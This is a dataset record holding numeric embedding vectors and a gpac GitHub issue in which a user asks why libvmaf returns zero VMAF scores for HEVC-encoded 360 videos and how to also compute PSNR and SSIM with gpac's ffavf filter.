-0.004508752841502428, -0.008280319161713123, 0.0058490922674536705, 0.00867497455328703, 0.008414353244006634, 0.004136436153203249, 0.0048847924917936325, -0.0017917731311172247, -0.025466447696089745, -0.003777150996029377, 0.008593064732849598, -0.024721816182136536, -0.007066566962748766, -0.00019023046479560435, -0.005890047177672386, 0.006887855473905802, -0.0036263626534491777, -0.002889176132157445, 0.004102927632629871, -0.0046427869237959385, -0.018109474331140518, -0.010059991851449013, 0.00405824976041913, 0.015756433829665184, 0.016664886847138405, -0.007077736780047417, 0.00434121023863554, -0.018868999555706978, -0.025317521765828133, -0.0018662364454939961, 0.022696413099765778, 0.029442789033055305, -0.0061357757076621056, -0.014393756166100502, -0.0029803935904055834, -0.010648251511156559, 0.03240642696619034, 0.008980274200439453, -0.010819517076015472, -0.02643447183072567, -0.015741541981697083, 0.012867257930338383, 0.006444798782467842, 0.0055288998410105705, -0.006839454174041748, 0.022309204563498497, 0.0023772409185767174, -0.010774839669466019, -0.002004924463108182, 0.025838764384388924, -0.003142351284623146, 0.012301336973905563, 0.006593725178390741, -0.0074202679097652435, 0.007744183298200369, 0.012971506454050541, 0.014349077828228474, -0.019122175872325897, 0.021370967850089073, 0.004557154141366482, -0.007033058907836676, -0.012755563482642174, -0.0033582947216928005, 0.00613205274567008, 0.017439303919672966, 0.010931212455034256, -0.0034178653731942177, -0.004326317925006151, -0.009218556806445122, 0.020760368555784225, 0.013842727057635784, 0.0018057350534945726, 0.011951359920203686, -0.002816574415192008, -0.0005608017090708017, -0.0015702447853982449, 0.006154391914606094, 0.0020030627492815256, -0.0105440029874444, 0.002174328314140439, 0.003142351284623146, 0.0030995348934084177, -0.008719651959836483, 0.00002616395977383945, -0.004858730360865593, -0.007855878211557865, -0.008071822114288807, 0.0026229696813970804, -0.0274471715092659, 0.017975440248847008, -0.00647830730304122, 0.00355748413130641, 0.0076548270881175995, -0.012189642526209354, -0.0004067557747475803, 0.005212430842220783, -0.012949167750775814, 0.006027804221957922, -0.03052995353937149, -0.004464074969291687, 0.0395549051463604, 0.0014846120029687881, -0.01328425295650959, -0.004691187757998705, -0.006891578435897827, -0.007040504831820726, 0.006467137485742569, -0.0036300858482718468, -0.0006403843872249126, 0.026374900713562965, -0.004054526798427105, -0.02784927375614643, 0.0026955713983625174, -0.015153281390666962, -0.036070022732019424, 0.017186129465699196, 0.015399010851979256, -0.029442789033055305, 0.0015246360562741756, -0.0052720014937222, 0.0006711005116812885, 0.007003273349255323, -0.008794115856289864, 0.0014855428598821163, -0.024230357259511948, 0.021668819710612297, -0.009911064989864826, -0.0006883201422169805, 0.004021018277853727, 0.011862003244459629, 0.00507839722558856, 0.006374058313667774, -0.01315021887421608, 0.003272661939263344, 0.014855428598821163, -0.0064112902618944645, -0.000016579719158471562, 0.01390974409878254, 0.009873833507299423, -0.02044762298464775, 0.02641957812011242, 0.0005291548441164196, 0.024557996541261673, 0.01315766479820013, 0.0017917731311172247, -0.0197774525731802, 0.003082780633121729, 0.007997358217835426, 0.0003043687320314348, 0.0041178204119205475, -0.00018580920004751533, -0.011385438963770866, 0.01003020629286766, -0.0020793876610696316, -0.030187422409653664, 0.013381054624915123, 0.00491830101236701, -0.013731032609939575, -0.018481791019439697, 0.002070079790428281, 0.019851915538311005, 0.01608407311141491, -0.011966252699494362, -0.013321484439074993, 0.006794776301831007, 0.031870290637016296, 0.022309204563498497, 0.01609896495938301, -0.010491878725588322, -0.0003020417643710971, -0.005588470492511988, -0.01723080687224865, 0.016784027218818665, 0.006400120444595814, 0.001973277423530817, 0.01175030879676342, -0.0029319925233721733, 0.012539619579911232, 0.010745054110884666, -0.015801113098859787, 0.012018376961350441, -0.018988141790032387, 0.012867257930338383, 0.00945683941245079, 0.015905361622571945, 0.004300255794078112, 0.0018559977179393172, -0.027045071125030518, -0.011876896023750305, -0.01199603732675314, -0.013381054624915123, 0.0013273083604872227, -0.018675396218895912, -0.005960787180811167, -0.009427053853869438, 0.0024181955959647894, 0.029055580496788025, -0.002166881924495101, -0.014326739124953747, 0.014937338419258595, 0.015622400678694248, -0.0012649452546611428, -0.0013366162311285734, 0.015264976769685745, 0.012018376961350441, 0.003976340405642986, 0.00016067783872131258, -0.010320613160729408, -0.004933193791657686, 0.019137067720294, -0.004281639587134123, 0.000452597247203812, 0.02848965860903263, 0.0009736076463013887, 0.0026657860726118088, 0.018705181777477264, 0.012137518264353275, -0.005957064218819141, 0.015637293457984924, 0.002671370981261134, -0.018303079530596733, 0.003682210110127926, 0.0013673322973772883, 0.016143644228577614, 0.009598319418728352, -0.023589974269270897, 0.00994829647243023, -0.01085674948990345, -0.006482030265033245, 0.005890047177672386, -0.004214622545987368, -0.01687338389456272, 0.006496923044323921, -0.005193815100938082, 0.0009996697772294283, 0.007431437261402607, -0.0050895665772259235, -0.0016912476858124137, 0.015235191211104393, -0.0070479512214660645, -0.004229515325278044, -0.0002200157759943977, -0.0051193516701459885, 0.01034295279532671, -0.011593936011195183, 0.006273533217608929, -0.010715268552303314, 0.0026192464865744114, 0.029681071639060974, -0.010112116113305092, 0.009531302377581596, -0.018079688772559166, -0.0001997710787691176, 0.006016634404659271, -0.009449392557144165, -0.0020719412714242935, 0.03472968190908432, -0.0001281001459574327, 0.033925481140613556, 0.009754692204296589, 0.004799159709364176, -0.006630956660956144, 0.013358715921640396, -0.003183305962011218, -0.025094132870435715, 0.011415223591029644, 0.0015730372397229075, 0.0059310016222298145, -0.005674103274941444, -0.02479627914726734, -0.02117736265063286, 0.014274614863097668, -0.013165111653506756, -0.0009321874240413308, 0.014349077828228474, -0.003416003892198205, 0.021773068234324455, 0.008749437518417835, 0.009494070895016193, 0.009933404624462128, -0.01231622975319624, 0.0006287494907155633, 0.001169073861092329, 0.0033843570854514837, 0.0013254467630758882, 0.03988254442811012, -0.04137181118130684, 0.005368804093450308, -0.01072271540760994, 0.018958356231451035, -0.019494492560625076, 0.002555952873080969, 0.01620321348309517, -0.004326317925006151, -0.009628104977309704, -0.012360908091068268, 0.01207794714719057, 0.0066532958298921585, 0.013060863129794598, 0.01207050122320652, 0.011929020285606384, 0.00517519935965538, 0.0019714159425348043, -0.013999100774526596, 0.022309204563498497, 0.01837754249572754, 0.0062065161764621735, -0.01685849018394947, -0.0217134989798069, 0.006828284822404385, -0.0058863237500190735, -0.031244801357388496, -0.004542261362075806, -0.009561087936162949, 0.017335055395960808, -0.00017510510224383324, 0.021370967850089073, -0.01347041130065918, -0.021132685244083405, 0.00744260661303997, -0.014669270254671574, -0.011586489155888557, 0.002801681635901332, 0.03076823614537716, -0.002166881924495101, 0.0017470951424911618, -0.012025822885334492, -0.0021370965987443924, 0.01455757487565279, -0.011668398976325989, -0.007033058907836676, -0.0019285994349047542, 0.007003273349255323, 0.009538748301565647, 0.0001244933228008449, -0.010000420734286308, 0.017186129465699196, 0.02373890019953251, -0.02245813049376011, -0.01761801727116108, -0.013753371313214302, -0.0014883351977914572, -0.010253596119582653, -0.012144964188337326, -0.01468416303396225, 0.010171687230467796, -0.046405527740716934, 0.00881645455956459, 0.008890918456017971, -0.019241316244006157, 0.012517280876636505, -0.00971001386642456, -0.006951149087399244, -0.009464285336434841, 0.01442354079335928, -0.002042155945673585, 0.022830447182059288, -0.004542261362075806, -0.02921939827501774, -0.0034588202834129333, 0.013045970350503922, -0.007342081516981125, 0.020224232226610184, -0.0014017716748639941, 0.010566342622041702, -0.004575769882649183, 0.007669719867408276, 0.0024814894422888756, -0.012822580523788929, -0.01684359833598137, -0.0058937701396644115, -0.013604444451630116, 0.008913257159292698, 0.006630956660956144, -0.00001895032801257912, 0.009598319418728352, 0.02385804057121277, -0.004337487276643515, -0.013239574618637562, 0.00886857882142067, -0.018437113612890244, -0.008421799167990685, -0.0031758598051965237, -0.005074673797935247, 0.008905810303986073, -0.03413397818803787, -0.003834859933704138, -0.007535685785114765, -0.0036673175636678934, 0.011891788803040981, -0.0044380128383636475, 0.0032894161995500326, -0.005536346230655909, -0.022115599364042282, -0.002278577070683241, -0.015935145318508148, -0.010432308539748192, -0.0009717460488900542, 0.007304849568754435, 0.0029040686786174774, -0.002116619376465678, 0.01058868132531643, -0.006366611924022436, 0.002917099744081497, -0.009352590888738632, 0.005383696407079697, -0.012211981229484081, 0.005525176879018545, 0.0018159737810492516, -0.015212852507829666, 0.02044762298464775, -0.01645638979971409, -0.015399010851979256, 0.02019444666802883, -0.0056517645716667175, -0.009687675163149834, -0.010923766531050205, -0.013232128694653511, 0.02095397189259529, -0.020715689286589622, 0.015413902699947357, -0.012673653662204742, -0.0006436421535909176, 0.019211530685424805, 0.00951640959829092, 0.01385017391294241, 0.0042779166251420975, -0.0008735475712455809, -0.010611020028591156, 0.002712325658649206, 0.006150668486952782, 0.002267407486215234, 0.01123651210218668, 0.01621810719370842, -0.016367033123970032, -0.003568653715774417, 0.0001917429908644408, 0.004471521358937025, 0.027417387813329697, -0.013835281133651733, -0.005633148830384016, 0.008481370285153389, 0.008823901414871216, -0.006031527183949947, 0.025704730302095413, 0.017186129465699196, 0.0015897915000095963, 0.012197088450193405, 0.023187872022390366, 0.0024740430526435375, 0.0033843570854514837, 0.009553641080856323, 0.018586039543151855, -0.001720102271065116, -0.008339889347553253, -0.0035034981556236744, 0.02643447183072567, 0.008920703083276749, 0.00862285029143095, 0.002611800329759717, 0.008511154912412167, -0.0010359706357121468, -0.009010059759020805, -0.017915869131684303, 0.0009307912550866604, -0.0013598860241472721, -0.00354445306584239, -0.010603574104607105, 0.006522985175251961, 0.011526918970048428, 0.016188321635127068, 0.004516199231147766, -0.0035984390415251255, 0.0049294703640043736, -0.002781204180791974, 0.0048773461021482944, -0.025600481778383255, -0.028296053409576416, -0.019956164062023163, 0.0016931092832237482, -0.0008460892713628709, -0.01105035375803709, -0.007431437261402607, -0.000995015841908753, -0.0015125357313081622, -0.002187359379604459, -0.021802853792905807, 0.004691187757998705, 0.026345115154981613, -0.0009075214620679617, -0.006861792877316475, 0.001921153161674738, 0.004155052360147238, -0.03184050694108009, 0.0038236903492361307, -0.020283803343772888, 0.027506742626428604, 0.014654377475380898, -0.027908844873309135, -0.009687675163149834, 0.00017266177746932954, 0.0018671673024073243, -0.004747035447508097, 0.013090647757053375, -0.01901792734861374, 0.01989659294486046, 0.016441496089100838, 0.007863324135541916, -0.0029282693285495043, 0.004955532494932413, -0.003540729871019721, 0.0038162441924214363, 0.007394205778837204, -0.012219427153468132, 0.013291698880493641, 0.019196638837456703, -0.0017964270664379, 0.010417415760457516, 0.008771777153015137, 0.02771523967385292, -0.01129608228802681, 0.022011350840330124, -0.012413032352924347, -0.00875688437372446, -0.014073563739657402, -0.0013673322973772883, -0.01175030879676342, 0.004188560415059328, -0.003131181700155139, 0.018049903213977814, -0.02543666400015354, 0.005897493567317724, 0.002950608264654875, 0.0005645249038934708, -0.0029282693285495043, -0.019598741084337234, 0.005603363271802664, -0.008935595862567425, -0.0043151481077075005, 0.0038646452594548464, 0.002777480985969305, -0.017409520223736763, -0.005595916882157326, -0.012420478276908398, -0.008220748044550419, 0.008131392300128937, 0.009360036812722683, -0.005700165405869484, 0.033776551485061646, 0.030559739097952843, -0.004169944673776627, -0.0014473804039880633, -0.015212852507829666, 0.022517701610922813, -0.013887405395507812, -0.01776694320142269, -0.011854557320475578, 0.010357844643294811, -0.0029748089145869017, 0.005141690839082003, -0.007840985432267189, 0.001376640284433961, -0.0002308362309122458, -0.0015060201985761523, 0.0017526799347251654, 0.004452905151993036, 0.0006669119466096163, -0.0013459241017699242, 0.009598319418728352, 0.00022350624203681946, 0.016128750517964363, 0.011363099329173565, -0.0013617476215586066, 0.0016447080997750163, -0.0016949708806350827, 0.014148026704788208, 0.011869450099766254, 0.05483477562665939, 0.02540687844157219, 0.01487776730209589, 0.010104670189321041, -0.004192283842712641, -0.013783156871795654, 0.009925957769155502, 0.00989617221057415, 0.0026862635277211666, 0.015652185305953026, 0.008801561780273914, 0.0034383428283035755, -0.012673653662204742, 0.0013049693079665303, 0.00983660202473402, -0.020000841468572617, 0.012189642526209354, 0.02348572388291359, -0.016515959054231644, 0.004985318053513765, -0.017156343907117844, 0.017945654690265656, 0.006742652039974928, 0.00019255743245594203, 0.007773968391120434, -0.016575530171394348, 0.0068580699153244495, 0.03916769474744797, -0.007632488384842873, 0.015547936782240868, -0.000551493838429451, 0.003082780633121729, -0.029815105721354485, -0.03642744570970535, 0.012144964188337326, -0.013902298174798489, -0.0020756644662469625, 0.011340760625898838, -0.017141452059149742, -0.0108641954138875, -0.003363879630342126, 0.004970425274223089, 0.004296532366424799, 0.016367033123970032, 0.0009037983254529536, -0.021162468940019608, 0.002500105183571577, 0.012599190697073936, -0.016545744612812996, 0.01989659294486046, 0.012919382192194462, 0.014326739124953747, -0.008719651959836483, -0.007040504831820726, -0.00805692933499813, -0.0011923435376957059, 0.022919803857803345, -0.010529110208153725, 0.004750758409500122, -0.016560638323426247, -0.00965044368058443, -0.005711335223168135, -0.018794536590576172, -0.0005100736161693931, 0.010975890792906284, 0.019360458478331566, 0.017260592430830002, -0.020656120032072067, -0.011847111396491528, -0.0044901371002197266, -0.008027143776416779, 0.012986399233341217, -0.009233449585735798, -0.009397268295288086, 0.00971001386642456, -0.03178093582391739, 0.012271551415324211, -0.0033415406942367554, 0.006515538785606623, -0.01175775472074747, 0.0010694791562855244, 0.0034290349576622248, 0.006657018791884184, -0.012048161588609219, -0.0007087975391186774, 0.005603363271802664, -0.0032279840670526028, 0.02603236958384514, 0.0066979737021028996, 0.00008452747715637088, 0.028668370097875595, 0.003367602825164795, 0.01751376874744892, -0.022279419004917145, 0.0016949708806350827, 0.0034532356075942516, 0.0026248313952237368, 0.005729950964450836, -0.011720523238182068, 0.00021885229216422886, 0.0033806338906288147, 0.015428795479238033, -0.005056058056652546, 0.0023418706841766834, 0.003203783417120576, -0.01417781226336956, 0.008071822114288807, 0.0072229402139782906, -0.0105440029874444, 0.014013992622494698, -0.002299054292961955, 0.018169045448303223, 0.010387630201876163, -0.014021439477801323, 0.006076205056160688, -0.010767392814159393, 0.002116619376465678, -0.021490108221769333, -0.03648701682686806, -0.015309654176235199, -0.003665455849841237, 0.001470650197006762, 0.009933404624462128, -0.02579408697783947, 0.0165904238820076, -0.0043151481077075005, -0.026121726259589195, 0.009166432544589043, -0.006977211218327284, 0.005648041144013405, 0.010335505940020084, -0.0197774525731802, 0.021728390827775, 0.027491850778460503, 0.0011067107552662492, 0.021758176386356354, -0.034282904118299484, -0.0007134514744393528, -0.018749859184026718, -0.013276806101202965, 0.010752500966191292, 0.006333103869110346, 0.0018280739895999432, 0.0007841916522011161, -0.04035910964012146, -0.01877964474260807, -0.0019230147590860724, 0.030589522793889046, 0.016754241660237312, -0.000032664956961525604, -0.013961868360638618, 0.01021636463701725, -0.016009610146284103, -0.006355442572385073, 0.005312956403940916, 0.01551815215498209, -0.013999100774526596, 0.007781414780765772, -0.008578171953558922, -0.0033657411113381386, -0.009032398462295532, 0.05772395059466362, 0.0023586249444633722, 0.031602226197719574, 0.0020440176595002413, -0.014185258187353611, 0.0072601716965436935, -0.01763290911912918, 0.006180454045534134, -0.029338540509343147, 0.026657860726118088, 0.015741541981697083, -0.004061973188072443, 0.009799370542168617, -0.008719651959836483, 0.0032931393943727016, -0.012800240889191628, -0.018675396218895912, -0.0001368263183394447, -0.009091968648135662, -0.010655698366463184, -0.0020886955317109823, 0.0062139625661075115, 0.025213273242115974, -0.011281189508736134, 0.00913664698600769, 0.020149769261479378, -0.01193646714091301, -0.008392013609409332, 0.005160306580364704, 0.000748821534216404, 0.02731313928961754, -0.010968443937599659, 0.007989912293851376, 0.016441496089100838, 0.0038311367388814688, 0.001508812652900815, 0.02156457118690014, 0.016024501994252205, 0.004516199231147766, -0.02400696836411953, 0.004143882542848587, 0.006597448606044054, -0.007144753821194172, -0.0020756644662469625, 0.009367482736706734, -0.007256448734551668, -0.007773968391120434, -0.0009568533860146999, 0.0052720014937222, 0.02272619865834713, 0.026732325553894043, -0.008801561780273914, -0.005674103274941444, 0.002688125241547823, -0.00021187136007938534, -0.012651314958930016, -0.004616724792867899, 0.007006996311247349, -0.00126959930639714, -0.02835562452673912, -0.010983336716890335, -0.016798920929431915, -0.01124395802617073, -0.010663144290447235, -0.02670253999531269, -0.012844919227063656, -0.007517070043832064, 0.03166179358959198, -0.022577272728085518, 0.013634230010211468, 0.01137054618448019, 0.005219877231866121, -0.018868999555706978, -0.013180004432797432, -0.012033268809318542, -0.009464285336434841, 0.0026304160710424185, -0.0040805889293551445, -0.000721363234333694, -0.013567212969064713, 0.0023176702670753, -0.015726648271083832, -0.008563279174268246, -0.006139499135315418, -0.00312745850533247, -0.0007553371251560748, 0.0006017565610818565, -0.01699252426624298, -0.013202343136072159, 0.025347307324409485, 0.010752500966191292, -0.0016232999041676521, -0.032257501035928726, -0.005867708008736372, 0.01761801727116108, -0.012085394002497196, -0.009531302377581596, -0.009114308282732964, 0.0010415554279461503, 0.009695122018456459, 0.005759736057370901, 0.012107732705771923, -0.029144935309886932, -0.005223600659519434, 0.010089777410030365, -0.016664886847138405, -0.0015171897830441594, -0.008526047691702843, 0.011124816723167896, 0.00217060511931777, -0.00001726326809148304, 0.0054916683584451675, -0.01379804965108633, -0.006102267652750015, 0.011735416017472744, 0.0121226254850626, 0.01800522580742836, 0.011787540279328823, 0.004099204670637846, 0.002246930031105876, -0.0076101492159068584, -0.004817775450646877, 0.022443238645792007, 0.016292570158839226, -0.0037752892822027206, 0.000617114594206214, 0.007558024954050779, 0.02786416746675968, 0.007464945781975985, 0.007479838561266661, 0.0022115600295364857, -0.0044454592280089855, 0.019449813291430473, 0.0036580096930265427, 0.010104670189321041, 0.004460351541638374, -0.01952427811920643, 0.0003825552121270448, 0.01916685327887535, -0.005115628708153963, -0.004456628579646349, 0.05084354057908058, 0.0011783817317336798, 0.00558102410286665, -0.005487945396453142, 0.002470320090651512, 0.012383246794342995, -0.0035034981556236744, -0.01507137157022953, -0.030738450586795807, 0.02476649358868599, 0.0012044438626617193, 0.0023455938789993525, 0.020879508927464485, 0.0062511940486729145, 0.0004802882904186845, 0.011385438963770866, 0.014162919484078884, -0.024185679852962494, -0.0022413453552871943, -0.002444257726892829, 0.0185413621366024, 0.0028798680286854506, 0.009985528886318207, 0.01557772234082222, 0.007036781869828701, 0.007163369562476873, -0.016932955011725426, 0.01864561066031456, -0.001872751978226006, -0.03332977369427681, 0.0011262574698776007, 0.003533283481374383, -0.0017545415321364999, 0.009062184020876884, 0.011057799682021141, 0.008049482479691505, 0.008734544739127159, -0.001075063948519528, 0.011638613417744637, 0.012740670703351498, 0.0020198170095682144, -0.012837473303079605, 0.015250083990395069, 0.02697060815989971, -0.02338147535920143, -0.01802011951804161, -0.010201471857726574, -0.005823030136525631, -0.0038795380387455225, 0.003401111112907529, -0.022636843845248222, 0.016784027218818665, 0.00543209770694375, -0.015294761396944523, 0.013768264092504978, 0.023545295000076294, -0.008697313256561756, 0.025719624012708664, 0.009732353501021862, 0.0030120403971523046, -0.019822129979729652, -0.01955406181514263, 0.013328930363059044 ]
119
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [X] I looked for a similar issue and couldn't find any. - [X] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - #[X] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ I'm working on 360 videos using MPEG-DASH-SRD. Details about my work are discussed in issue #1683. I'm trying to compute VMAF and PSNR for 360 videos. For which I used avfilter with libvmaf. When I calculated vmaf I got 0 vmaf score for most of the frames.I have attached the log for the same. I'm not sure if there's some issue with my video or I'm calculating vmaf in wrong way. I used following command. `gpac -i original.mp4:#ffid=dist -i distorted.mp4:#ffid=ref ffavf::f=[dist][ref]libvmaf=log_path=libvmaf.log @ -o null` vmaf score [libvmaf.log](https://github.com/gpac/gpac/files/6181668/libvmaf.log) https://user-images.githubusercontent.com/20301133/111981307-81a81e80-8b2d-11eb-84ff-7aad54f850a3.mp4 https://user-images.githubusercontent.com/20301133/111981319-85d43c00-8b2d-11eb-9654-a9d55efcb81a.mp4 This second video (distorted.mp4) can be played with only mp4client,if there's a way to make it compatible with every other video player please let me know. Also I wanted to calculate psnr and ssim score along with the vmaf for which I used following command but I just got the vmaf score. `gpac -i original.mp4:#ffid=dist -i distorted.mp4:#ffid=ref ffavf::f=[dist][ref]libvmaf=log_path=libvmaf.log::psnr=true=log_path=psnr.log @ -o null`
QA of HEVC encoded 360 video | VMAF | PSNR
https://api.github.com/repos/gpac/gpac/issues/1713/comments
5
2021-03-22T11:17:05
2021-03-29T11:56:53Z
https://github.com/gpac/gpac/issues/1713
837,614,496
1,713
false
This is a GitHub Issue repo:gpac owner:gpac Title : QA of HEVC encoded 360 video | VMAF | PSNR Issue date: --- start body --- Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [X] I looked for a similar issue and couldn't find any. - [X] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - #[X] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ I'm working on 360 videos using MPEG-DASH-SRD. Details about my work are discussed in issue #1683. I'm trying to compute VMAF and PSNR for 360 videos. For which I used avfilter with libvmaf. When I calculated vmaf I got 0 vmaf score for most of the frames.I have attached the log for the same. I'm not sure if there's some issue with my video or I'm calculating vmaf in wrong way. I used following command. `gpac -i original.mp4:#ffid=dist -i distorted.mp4:#ffid=ref ffavf::f=[dist][ref]libvmaf=log_path=libvmaf.log @ -o null` vmaf score [libvmaf.log](https://github.com/gpac/gpac/files/6181668/libvmaf.log) https://user-images.githubusercontent.com/20301133/111981307-81a81e80-8b2d-11eb-84ff-7aad54f850a3.mp4 https://user-images.githubusercontent.com/20301133/111981319-85d43c00-8b2d-11eb-9654-a9d55efcb81a.mp4 This second video (distorted.mp4) can be played with only mp4client,if there's a way to make it compatible with every other video player please let me know. Also I wanted to calculate psnr and ssim score along with the vmaf for which I used following command but I just got the vmaf score. `gpac -i original.mp4:#ffid=dist -i distorted.mp4:#ffid=ref ffavf::f=[dist][ref]libvmaf=log_path=libvmaf.log::psnr=true=log_path=psnr.log @ -o null` --- end body ---
2,133
[ -0.0034920373000204563, 0.05147712677717209, -0.01992710493505001, -0.010841171257197857, 0.014941642060875893, -0.01253740955144167, -0.03714023157954216, 0.043305687606334686, -0.020767848938703537, 0.027420051395893097, 0.012235036119818687, -0.021490594372153282, 0.009793928824365139, 0.007043073885142803, 0.006596889812499285, 0.024720821529626846, -0.000012618073014891706, 0.002514856867492199, -0.002933385083451867, 0.006784950848668814, -0.006209705024957657, -0.02526656724512577, -0.012788156978785992, 0.035340745002031326, -0.001534910756163299, -0.01390177384018898, -0.0031656958162784576, 0.014277896843850613, 0.0049080271273851395, -0.006670638918876648, 0.01964685693383217, 0.009852929040789604, -0.018009619787335396, 0.028010046109557152, 0.049471139907836914, 0.009439931251108646, 0.053571611642837524, 0.027420051395893097, 0.0040451581589877605, 0.013533026911318302, -0.02892453968524933, -0.011593416333198547, -0.019366608932614326, 0.02234608866274357, -0.02936703711748123, -0.021785592660307884, 0.005284149199724197, 0.010383924469351768, -0.013370778411626816, -0.040119707584381104, 0.02143159508705139, -0.012271910905838013, -0.036432236433029175, -0.014418020844459534, 0.006427265703678131, -0.04127020016312599, 0.036432236433029175, -0.008223065175116062, 0.02495681867003441, 0.005121900234371424, 0.004211094696074724, 0.016814878210425377, -0.030045531690120697, 0.018186617642641068, -0.005166150163859129, -0.024175073951482773, -0.006796013098210096, 0.02770029939711094, -0.04017870873212814, 0.013053655624389648, 0.008650812320411205, -0.008591813035309315, 0.020561350509524345, 0.03607823699712753, 0.016873877495527267, -0.020723599940538406, 0.025650063529610634, 0.03613723814487457, -0.04203719645738602, 0.017493372783064842, -0.036579735577106476, -0.0035362867638468742, -0.06006156653165817, -0.005833582486957312, 0.03728773072361946, 0.00034132174914702773, -0.03932321444153786, -0.07723043859004974, -0.024175073951482773, 0.008215690031647682, 0.002752698725089431, 0.04085720330476761, 0.04127020016312599, -0.016475630924105644, 0.011099294759333134, 0.03315775841474533, -0.03026678040623665, -0.008311565034091473, -0.02783304825425148, -0.04239119216799736, -0.03280376270413399, 0.0004761449818033725, 0.013769024983048439, -0.012478409335017204, 0.03840872272849083, -0.019484609365463257, 0.0031159149948507547, -0.03699273243546486, 0.014786767773330212, 0.1285010725259781, 0.01588563434779644, -0.0017967213643714786, -0.003263413906097412, -0.028880290687084198, -0.0072126975283026695, -0.0086065623909235, -0.020649850368499756, -0.021638093516230583, 0.017493372783064842, -0.022065840661525726, -0.019012611359357834, -0.011689290404319763, -0.008363189175724983, 0.015081766061484814, -0.010199551470577717, 0.07262847572565079, -0.026697305962443352, 0.01966160722076893, 0.012198161333799362, -0.032361265271902084, -0.024352073669433594, -0.00986767839640379, 0.00023461549426428974, -0.03669773414731026, 0.006113830488175154, -0.009506305679678917, -0.031092774122953415, 0.056315090507268906, 0.03537024185061455, -0.00431434391066432, -0.02759704925119877, -0.048556648194789886, 0.033806756138801575, 0.019558358937501907, -0.005579147022217512, -0.011062419973313808, 0.0064198910258710384, 0.03206626698374748, -0.02104809693992138, -0.0013403965858742595, -0.03333475813269615, -0.023275330662727356, -0.01859961450099945, -0.004852714948356152, 0.05460410565137863, 0.005656584165990353, 0.02671205624938011, 0.02538456581532955, -0.014005023054778576, -0.030768277123570442, 0.002066828776150942, -0.028511542826890945, 0.0047052158042788506, 0.008724561892449856, 0.022537836804986, -0.031269773840904236, -0.01870286464691162, 0.011836789548397064, 0.003228382905945182, 0.019027361646294594, -0.0034994122106581926, -0.0050444635562598705, 0.011504916474223137, 0.004498717375099659, -0.03525224328041077, -0.031240273267030716, 0.029573535546660423, 0.03286276012659073, -0.04097520187497139, -0.011888413690030575, -0.04280418902635574, -0.01392389927059412, 0.01588563434779644, 0.002570168813690543, 0.014867892488837242, -0.03333475813269615, 0.07032749056816101, -0.04540017247200012, 0.01834886707365513, 0.00037105201045051217, 0.023467080667614937, 0.02523706667125225, 0.049825139343738556, -0.011556541547179222, 0.02143159508705139, -0.04357118532061577, -0.020531851798295975, -0.03814322501420975, 0.00855493824928999, -0.02672680653631687, 0.0015570356044918299, -0.013297028839588165, -0.006648514419794083, -0.022803334519267082, 0.007533507887274027, 0.027110302820801735, 0.007706819102168083, 0.06348353624343872, -0.00801656674593687, -0.015457888133823872, -0.06395553797483444, -0.025502564385533333, -0.0016077383188530803, 0.00929243303835392, -0.028142796829342842, 0.02134309522807598, -0.014786767773330212, -0.017567122355103493, -0.022065840661525726, 0.010553548112511635, 0.03159427270293236, -0.0210775975137949, 0.0014353489968925714, 0.006305579096078873, -0.040650706738233566, -0.009565305896103382, 0.011121419258415699, -0.021520094946026802, -0.024499572813510895, -0.002265952294692397, 0.058999571949243546, 0.030163532122969627, 0.009469431824982166, 0.004126282408833504, 0.007861693389713764, 0.015089140273630619, -0.014602393843233585, -0.008931060321629047, -0.02392432652413845, 0.010199551470577717, -0.022980334237217903, 0.004937526769936085, 0.015133390203118324, 0.005457460414618254, 0.005660271272063255, 0.03433775156736374, -0.004196344409137964, 0.01989760622382164, -0.016726378351449966, -0.02274433523416519, 0.014152522198855877, -0.049500640481710434, -0.004332781303673983, 0.006187580060213804, -0.019086360931396484, 0.036402735859155655, 0.029440786689519882, 0.01722787506878376, -0.014123022556304932, -0.06495852768421173, -0.011504916474223137, -0.007522445637732744, -0.02796579711139202, -0.022080589085817337, 0.004170532338321209, -0.028895040974020958, -0.01700662635266781, -0.018924113363027573, 0.013068404980003834, -0.04194869473576546, -0.0010122114326804876, -0.01712462678551674, -0.04643266275525093, -0.009970927610993385, -0.022036340087652206, -0.014314771629869938, -0.0065563274547457695, -0.014034523628652096, 0.04348268359899521, 0.014115647412836552, -0.004192657303065062, -0.014875267632305622, -0.01000780239701271, 0.030768277123570442, -0.01730162464082241, -0.012360410764813423, 0.04380718246102333, -0.008879435248672962, -0.05613809451460838, 0.013274903409183025, 0.022818084806203842, 0.03407225385308266, -0.04250919073820114, 0.001863095909357071, 0.000025336974431411363, 0.00929243303835392, -0.023201581090688705, -0.004129969980567694, 0.04905814304947853, -0.001847424078732729, -0.016475630924105644, 0.02396857552230358, 0.006685389205813408, -0.012153912335634232, -0.04079820588231087, -0.003556567942723632, -0.04233219474554062, 0.03563574329018593, 0.020782599225640297, -0.045813169330358505, 0.03035528026521206, -0.010140551254153252, -0.03309876099228859, -0.013547777198255062, -0.00009368486644234508, 0.024204574525356293, 0.0007471742574125528, -0.025900812819600105, -0.03551774099469185, 0.012788156978785992, -0.008141941390931606, 0.009071184322237968, -0.022980334237217903, 0.037759725004434586, -0.011681915260851383, -0.02143159508705139, -0.032331764698028564, -0.02799529768526554, -0.05065113306045532, -0.006430953275412321, 0.014115647412836552, 0.005922081880271435, 0.011128794401884079, -0.027051303535699844, 0.04121120274066925, -0.03879221901297569, -0.029411286115646362, -0.006611639633774757, 0.0016943939263001084, -0.015472637489438057, -0.02134309522807598, 0.010214300826191902, 0.012633283622562885, -0.017493372783064842, 0.040326207876205444, -0.028467293828725815, 